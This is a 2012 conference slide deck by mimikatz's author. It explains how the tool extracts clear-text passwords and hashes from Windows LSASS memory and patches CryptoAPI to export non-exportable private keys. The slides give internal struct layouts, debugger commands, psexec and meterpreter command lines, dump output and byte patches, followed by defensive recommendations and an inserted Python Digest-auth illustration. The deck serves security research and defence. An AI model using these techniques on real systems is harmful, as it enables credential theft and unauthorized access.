mimikatz

Benjamin DELPY `gentilkiwi`

focus on sekurlsa/pass-the-pass and crypto patches

Who ? Why ?
  • Benjamin DELPY `gentilkiwi`
    • French
    • 26y
    • Kiwi addict
    • Lazy programmer
  • Started to code mimikatz to :
    • explain security concepts ;
    • improve my knowledge ;
    • prove to Microsoft that sometimes they must change old habits.
  • Why all in French ?
    • because I’m 
    • It limits script kiddies usage
    • Hack with class

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz - working
  • On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
    • x86 & x64
    • 2000 support dropped with mimikatz 1.0
  • Everywhere ; it’s statically compiled
  • Two modes
    • direct action (local commands) – process or driver communication

[Diagram: mimikatz.exe either acts directly on a service, e.g. crypto::patchcng against KeyIso (« CNG Key Isolation », in LSASS.EXE) and divers::eventdrop against EventLog (« Windows Event Log », in SVCHOST.EXE), using VirtualAllocEx, WriteProcessMemory, CreateRemoteThread... ; or it injects sekurlsa.dll into SamSS (« Security Accounts Manager », in LSASS.EXE), which opens a pipe, writes a welcome message, then waits for commands and returns results to mimikatz.exe.]

mimikatz - architecture of sekurlsa & crypto

[Architecture diagram ; the names it shows :]

mimikatz.exe command modules : mod_mimikatz_standard, mod_mimikatz_winmine, mod_mimikatz_divers, mod_mimikatz_nogpo, mod_mimikatz_crypto, mod_mimikatz_impersonate, mod_mimikatz_inject, mod_mimikatz_samdump (sam, secrets), mod_mimikatz_handle, mod_mimikatz_privilege, mod_mimikatz_system, mod_mimikatz_service, mod_mimikatz_sekurlsa (msv_1_0, tspkg, wdigest, livessp, kerberos), mod_mimikatz_process, mod_mimikatz_thread, mod_mimikatz_terminalserver

Shared libraries : mod_parseur, mod_text, mod_cryptoapi, mod_memory, mod_secacl, mod_crypto, mod_pipe, mod_cryptoacng, mod_inject, mod_hive, mod_patch, mod_privilege, mod_system, mod_service, mod_process, mod_thread, mod_ts

Driver : mimikatz.sys

Injectable DLLs : kappfree.dll, kelloworld.dll, klock.dll, sekurlsa.dll (msv_1_0, tspkg, wdigest, livessp, kerberos)

mimikatz :: sekurlsa - what is it ?

mod_mimikatz_sekurlsa

  • A module replacement for my previous favorite library !
  • A local module that can read data from the SamSS Service (well known LSASS process)
  • What sekurlsa module can dump :
    • MSV1_0 hashes
    • TsPkg passwords
    • Wdigest passwords
    • LiveSSP passwords
    • Kerberos passwords (!)
    • …?

mimikatz :: sekurlsa - how LSA works (PLAYSKOOL level)

[Diagram: WinLogon passes user:domain:password to LsaSS ; authentication is done by msv1_0 against the SAM or by kerberos ; the Authentication Packages (msv1_0, tspkg, wdigest, livessp, kerberos) then answer Challenge / Response exchanges.]

mimikatz :: sekurlsa - how LSA works (PLAYSKOOL level)

  • Authentication packages :
    • take user’s credentials from the logon
    • make their own stuff
    • keep enough data in memory to compute responses of challenges (Single Sign On)
  • If we can get this data and inject it into another LSASS session, we skip the authentication part
  • This is the principle of « Pass-the-hash »
    • In fact, of « Pass-the-x »

mimikatz :: sekurlsa - history of « pass-the-* » 1/2
  • Pass-the-hash
    • 1997 - Unix modified SAMBA client for Hashes usage ; Paul Ashton (EIGEN)
    • 2000 - Private version of a Windows « LSA Logon Session Editor » ; Hernan Ochoa (CoreSecurity)
    • 2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) presents msvctl and provides some downloads of it
    • 2007 - « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity)
    • 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself but in French; so not famous ;))

2007 was the year of pass the hash !

  • Pass-the-ticket
    • 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support ; Hernan Ochoa (Ampliasecurity)

mimikatz :: sekurlsa - history of « pass-the-* » 2/2
  • Pass-the-pass
    • 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT 6 and some XP SP3)
      • http://blog.gentilkiwi.com/securite/pass-the-pass
    • 05/2011 – return of mimikatz ; it dumps clear text passwords from WDigest provider (unlimited this time ;))
      • http://blog.gentilkiwi.com/securite/re-pass-the-pass
    • 05/2011 – Some organizations opened cases to Microsoft about it…

…Lots of time…

    • begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say few words about mimikatz
    • 03/2012 - Hernan Ochoa (Ampliasecurity) publishes on seclists that wce supports WDigest password extraction…
      • http://seclists.org/pen-test/2012/Mar/7
    • 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
      • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
    • 03/2012 – yeah, once again… ; more curious, but Kerberos keeps passwords in memory
      • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
    • 08/2012 – sekurlsa module without injection at all ! (ultra safe)
      • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition

mimikatz :: sekurlsa :: tspkg
  • because sometimes hash is not enough…

mimikatz :: sekurlsa :: tspkg - what is it ?
  • Microsoft introduced SSO capability for Terminal Server with NT 6 to improve the RemoteApps and Remote Desktop users' experience
    • http://technet.microsoft.com/library/cc772108.aspx
  • Relies on CredSSP with Credentials Delegation (!= Account delegation)
    • Specs : http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
  • First impression : it seems cool 
    • User does not have to type its password
    • Password is not in RDP file
    • Password is not in user secrets

mimikatz :: sekurlsa :: tspkg - questions ?
  • KB says that for it to work, we must enable « Default credentials » delegation
    • “Default credentials : The credentials obtained when the user first logs on to Windows” - https://msdn.microsoft.com/library/bb204773.aspx
      • What ? Our User/Domain/{Password | Hash | Ticket} ? It seems …
        • In all cases, system seems to be vulnerable to pass-the-*…
  • In what form ?

Our specs : [MS-CSSP]

    • 2.2.1.2.1 TSPasswordCreds
      • The TSPasswordCreds structure contains the user's password credentials that are delegated to the server. (or PIN)

TSPasswordCreds ::= SEQUENCE {
    domainName [0] OCTET STRING,
    userName   [1] OCTET STRING,
    password   [2] OCTET STRING
}

    • Challenge / response for authentication ?
      • Server : YES (TLS / Kerberos)
      • Client : NO ; *password* is sent to server…
  • So password resides somewhere in memory ?

mimikatz :: sekurlsa :: tspkg - symbols & theory
  • Let’s explore some symbols !
    • sounds cool… (thanks Microsoft)
  • Let’s imagine a scenario
    • Enumerate all sessions to obtain :
      • Username
      • Domain
      • LUID
    • Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain :
      • TS_CREDENTIAL
    • Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for :
      • TS_PRIMARY_CREDENTIAL with clear text credentials…

kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>

mimikatz :: sekurlsa :: tspkg - workflow

LsaEnumerateLogonSessions → for each LUID → tspkg!TSGlobalCredTable (RtlLookupElementGenericTableAvl) → KIWI_TS_CREDENTIAL → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear !

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

mimikatz :: sekurlsa :: tspkg - demo time !
  • sekurlsa::tspkg

mimikatz :: sekurlsa :: wdigest
  • because clear text password over http/https is not cool

mimikatz :: sekurlsa :: wdigest - what is it ?
  • “Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]”

Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication

  • “Common Digest Authentication Scenarios :
    • Authenticated client access to a Web site
    • Authenticated client access using SASL
    • Authenticated client access with integrity protection to a directory service using LDAP”

Microsoft : http://technet.microsoft.com/library/cc778868.aspx

  • Again, it seems cool 
    • No password over the network, just hashes
    • No reversible password in Active Directory ; hashes for each realm
      • Only with Advanced Digest authentication

mimikatz :: sekurlsa :: wdigest - what is it ? (continued)
  • We speak about hashes, but what hashes ?

H = MD5(HA1:nonce:[…]:HA2)

      • HA1 = MD5(username:realm:password)
      • HA2 = MD5(method:digestURI:[…])
  • Even after login, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon
  • The WDigest provider must have the elements to compute responses for different servers :
    • Username
    • Realm (from server)
    • Password
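As an added illustration of the HA1/HA2 arithmetic above (example code written for this page, not code from the slides or from mimikatz): the RFC 2617 Digest computation for qop=auth, checked against the RFC's own published example, plus two client variants. A client that holds only the HA1 values computed at logon time can answer only realms it has already seen, while one that holds the password can answer any realm the server names; the server side needs nothing but HA1 for its own realm. The second realm, its nonce and the URIs are constructed values, and "qop=auth" stands in for the slide's "[…]" terms.

```python
import hashlib
import hmac


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); the realm is chosen by the server."""
    return md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI), the qop=auth form (no entity-body hash)."""
    return md5_hex(f"{method}:{digest_uri}")


def digest_response(ha1_hex: str, nonce: str, nc: str, cnonce: str, qop: str, ha2_hex: str) -> str:
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2); nc:cnonce:qop is the slide's '[...]'."""
    return md5_hex(f"{ha1_hex}:{nonce}:{nc}:{cnonce}:{qop}:{ha2_hex}")


def respond_from_password(username, password, challenge, method, uri, nc, cnonce):
    """Client holding the clear password: can answer whatever realm the server names."""
    h1 = ha1(username, challenge["realm"], password)
    return digest_response(h1, challenge["nonce"], nc, cnonce, challenge["qop"], ha2(method, uri))


def respond_from_ha1_cache(username, ha1_cache, challenge, method, uri, nc, cnonce):
    """Client holding only per-realm HA1 values: returns None for a realm it never saw."""
    h1 = ha1_cache.get((username, challenge["realm"]))
    if h1 is None:
        return None
    return digest_response(h1, challenge["nonce"], nc, cnonce, challenge["qop"], ha2(method, uri))


def server_verify(stored_ha1, challenge, method, uri, nc, cnonce, response):
    """Server side: stores only HA1 for its own realm and recomputes the response."""
    expected = digest_response(stored_ha1, challenge["nonce"], nc, cnonce, challenge["qop"], ha2(method, uri))
    return hmac.compare_digest(expected, response)


# Known-answer values from RFC 2617 section 3.5 (the only non-constructed input here).
RFC2617 = {
    "username": "Mufasa", "realm": "testrealm@host.com", "password": "Circle Of Life",
    "nonce": "dcd98b7102dd2f0e8b11d0f600bfb0c093", "method": "GET", "uri": "/dir/index.html",
    "nc": "00000001", "cnonce": "0a4f113b", "qop": "auth",
    "response": "6629fae49393a05397450978507c4ef1",
}


def rfc2617_known_answer() -> bool:
    """True when the arithmetic above reproduces the RFC's published response."""
    ch = {"realm": RFC2617["realm"], "nonce": RFC2617["nonce"], "qop": RFC2617["qop"]}
    got = respond_from_password(RFC2617["username"], RFC2617["password"], ch,
                                RFC2617["method"], RFC2617["uri"], RFC2617["nc"], RFC2617["cnonce"])
    return got == RFC2617["response"]


def second_realm_demo():
    """Constructed second server in another realm: only the password-holding client can answer it."""
    user, password = RFC2617["username"], RFC2617["password"]
    challenge = {"realm": "other.example", "nonce": "0123456789abcdef", "qop": "auth"}  # constructed
    method, uri, nc, cnonce = "GET", "/secret", "00000001", "feedface"                 # constructed
    # What a provider storing only logon-time HA1 values would hold: the first realm only.
    cache = {(user, RFC2617["realm"]): ha1(user, RFC2617["realm"], password)}
    from_password = respond_from_password(user, password, challenge, method, uri, nc, cnonce)
    from_cache = respond_from_ha1_cache(user, cache, challenge, method, uri, nc, cnonce)
    server_ok = server_verify(ha1(user, challenge["realm"], password), challenge,
                              method, uri, nc, cnonce, from_password)
    return from_password, from_cache, server_ok


if __name__ == "__main__":
    print("RFC 2617 known answer reproduced:", rfc2617_known_answer())
    print("second realm (from password, from HA1 cache, server accepts):", second_realm_demo())
```

The cache variant returns None for the constructed second realm, which is the whole reason the slide lists Username, Realm and Password as what the provider must keep: HA1 is bound to a realm that only the server reveals.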

mimikatz :: sekurlsa :: wdigest - theory
  • This time, we know :
    • that WDigest keeps the password in memory « by protocol » for the HA1 digest
    • that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
  • LsaUnprotectMemory
    • At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
    • Let's search for it in WDigest :
    • Hypothesis seems verified
  • LsaProtectMemory
    • At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
    • Let's search for it in WDigest :
    • SpAcceptCredentials takes the clear password in its args
      • Protects it with LsaProtectMemory
      • Updates or inserts data in a doubly linked list : wdigest!l_LogSessList

.text:7409D151 _DigestCalcHA1@8         call dword ptr [eax+0B4h]
.text:74096C69 _SpAcceptCredentials@16  call dword ptr [eax+0B0h]

mimikatz :: sekurlsa :: wdigest - workflow

LsaEnumerateLogonSessions → for each LUID → wdigest!l_LogSessList → search linked list for LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear !

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    […]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

mimikatz :: sekurlsa :: wdigest - demo time !
  • sekurlsa::wdigest

mimikatz :: sekurlsa :: livessp
  • because Microsoft was too good in closed networks

mimikatz :: sekurlsa :: livessp - how
  • Actually I've only used a logical (empirical) approach to search for passwords… :
    • Protocol reading
    • Symbols searching

~ Boring ~… be more brutal this time : make a WinDBG trap !

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe

0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
............................................................
0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g"
0: kd> g

mimikatz :: sekurlsa :: livessp - how (continued)
  • Let’s login with a Live account on Windows 8 !
  • After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

Stacks captured by the trap (innermost frame first) :

lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
    ← Our LiveSSP provider

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
    ← Yeah, Pass the Hash capability with Live account too…

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
    ← Live user can logon through RDP via SSO

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

mimikatz :: sekurlsa :: livessp - workflow

LsaEnumerateLogonSessions → for each LUID → livessp!LiveGlobalLogonSessionList → search linked list for LUID → KIWI_LIVESSP_LIST_ENTRY → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear !

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

mimikatz :: sekurlsa
  • Even if we already have tools for normal accounts, are you not curious to test one with this trap ?*

* Me, yes

mimikatz :: sekurlsa :: kerberos
  • Let's login with a normal account
  • After credentials protection, KerbCreateLogonSession calls :
    • NT6 ; KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
    • NT5 ; KerbInsertLogonSession to insert data in KerbLogonSessionList

Stacks captured by the trap (innermost frame first) :

lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
    ← Kerberos, ticket part ? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
    ← Kerberos part for password ??????

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

mimikatz :: sekurlsa :: kerberos (nt6) - workflow

LsaEnumerateLogonSessions → for each LUID → kerberos!KerbGlobalLogonSessionTable (RtlLookupElementGenericTableAvl) → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear !

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;

mimikatz :: sekurlsa :: kerberos (nt5) - workflow

LsaEnumerateLogonSessions → for each LUID → kerberos!KerbLogonSessionList → search linked list for LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear !

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;

mimikatz :: sekurlsa - demo time !
  • Final sekurlsa demo : sekurlsa::logonPasswords full

mimikatz :: sekurlsa :: kerberos - “hu?”
  • Ok, it works…* But why ?
    • * Not at every logon on NT5 (can need an unlock)
  • From my understanding of Microsoft explanations
    • no need of passwords for the Kerberos protocol…
    • all is based on the hash (not very sexy too)
  • Microsoft’s implementation of Kerberos is full of logical…
    • For password auth :
      • password hash for shared secret, but keeping password in memory
    • For full smartcard auth :
      • No password on client
      • No hash on client ?
        • NTLM hash on client…
        • KDC sent it back as a gift

mimikatz :: sekurlsa
  • All passwords in memory are encrypted, but in a reversible way, so that they can be used
  • We used LsaUnprotectMemory, in the LSASS context, to decrypt them
    • This function relies on LsaEncryptMemory from lsasrv.dll
  • For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process to take advantage of its keys when we called it
  • Can it be fun to decrypt outside the process ?
    • Yes, it is… no more injection, just reading the memory of the LSASS process…
  • mimikatz can use lsasrv.dll too and “imports” the keys initialized by LSASS
    • When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we get the same behaviour as when we are in LSASS !

mimikatz :: sekurlsa - LsaEncryptMemory NT5
  • Depending on the size of the secret, LsaEncryptMemory uses :
    • RC4
    • DESx

[Diagram: mimikatz copies the LsaEncryptMemory key material from lsasrv inside lsass into its own copy of lsasrv : g_cbRandomKey (DWORD ; 256), g_pRandomKey (@BYTE[g_cbRandomKey]), g_pDESXKey (@BYTE[144]) and a BYTE[8] block.]

mimikatz :: sekurlsa - LsaEncryptMemory NT6
  • Depending on the size of the secret, LsaEncryptMemory uses :
    • 3DES
    • AES

[Diagram: mimikatz copies from lsasrv inside lsass a BYTE[16] block and the h3DesKey / hAesKey handles (KIWI_BCRYPT_KEY, whose cle member points to a KIWI_BCRYPT_KEY_DATA) into its own copy of lsasrv.]

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc... */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

mimikatz :: sekurlsa - memo
  • Security Packages
  • Protection Keys

mimikatz :: sekurlsa - memo (continued)
  • Some commands :
    • mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
    • psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
    • meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        livessp :       n.t. (LUID KO)

mimikatz :: sekurlsa - what can we do ?
  • Basics
    • No physical access to computer (first step to pass the hash, then pass the pass)
    • No admin rights / system rights / debug privileges (…)
    • Disable local admin accounts
    • Strong passwords (haha, it was a joke ; so useless !!!)
    • For privileged accounts, network logon instead of interactive (when possible)
    • Audit ; pass the hash keeps traces and can lock accounts
    • No admin rights / system rights / debug privileges, even VIP
    • Use a separate network (or forest) for privileged tasks
  • More in depth
    • Force strong authentication (SmartCard & Token) : $ / €
    • Short validity for Kerberos tickets
    • No delegation
    • Disable NTLM (available with NT6)
    • Nothing exotic :
      • biometrics (it keeps the password somewhere and pushes it to Windows)
      • single sign on
    • Stop using shared secrets for authentication : push Public / Private stuff (like keys ;))
    • Take opportunities to drop backward compatibility
    • Disable faulty providers ?
      • Is it supported by Microsoft ?
      • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0 ?

mimikatz :: crypto - what is it ?

mod_mimikatz_crypto

  • A little module that I wrote to :
    • play with Windows Cryptographic API / CNG and RSA keys
    • automate export of certificates/keys
      • Even those which are “not” exportable 
  • What the crypto module can do :
    • List
      • Providers
      • Stores
      • Certificates
      • Keys
    • Export
      • Certificates
        • public in DER format
        • with private keys in PFX format
      • Private keys in PVK format
        • it’s cool, OpenSSL can deal with it too 
    • Patch
      • CryptoAPI in mimikatz context
      • CNG in LSASS context (again !)

mimikatz :: crypto - how it's protected
  • Private keys are DPAPI protected
    • You cannot reuse private key files on another computer
      • At least without the master keys and/or password of users
  • Computer/User can load their own keys because they have enough secrets to do it (ex : session opened)
    • Yes, a computer/server opens a “session”
  • Export/Usage can be limited by :
    • Password
    • Popup
    • Export/Archive flag not present

Constraint for most users

Unavailable for computer keys

certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport

mimikatz :: crypto :: capi - how it works
  • “Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardware.”
    • http://technet.microsoft.com/library/cc962093.aspx
  • Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff : CSP (keys), smartcard reader, …
    • cryptdll.dll, rsaenh.dll, …
  • Processes deal with cryptographic keys through this API…

mimikatz :: crypto :: capi - how it's exported (PLAYSKOOL level)

[Diagram: Process → CryptoAPI and RSA CSP → Load Private Key → DPAPI Decode → Exportable ? ; when the process asks to export the key : yes → Exported Key ; no → NTE_BAD_KEY_STATE.]

mimikatz :: crypto :: patchcapi - because I own my process
  • When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey
  • This function does all the work to prepare the export, and checks if the key is exportable

Exportable ?

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet: CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = {470ADFBA-8718-4014-B05E-B30776B75A03}
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
        Container Clé : {470ADFBA-8718-4014-B05E-B30776B75A03}
        Provider : Microsoft Enhanced Cryptographic Provider v1.0
        Type : AT_KEYEXCHANGE
        Exportabilité : NON
        Taille clé : 2048
        Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO
        (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

mimikatz :: crypto :: patchcapi - because I own my process (continued)
  • So what ? A module in my own process returns that I can't do something ? CryptoAPI is in my memory space, let's patch it !
  • I wrote “4” bytes in my memory space

.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: crypto :: patchcapi - demo time!
  • Import, export, import as not exportable... export


mimikatz :: crypto :: patchcapi - limitations
  • Because:
    • I'm lazy
    • In the majority of real-life cases I've seen RSA keys
      • Elliptic curve, a little...
  • mimikatz crypto::patchcapi only deals with:
    • Microsoft Base Cryptographic Provider v1.0
    • Microsoft Enhanced Cryptographic Provider v1.0
    • Microsoft Enhanced RSA and AES Cryptographic Provider
    • Microsoft RSA SChannel Cryptographic Provider
    • Microsoft Strong Cryptographic Provider
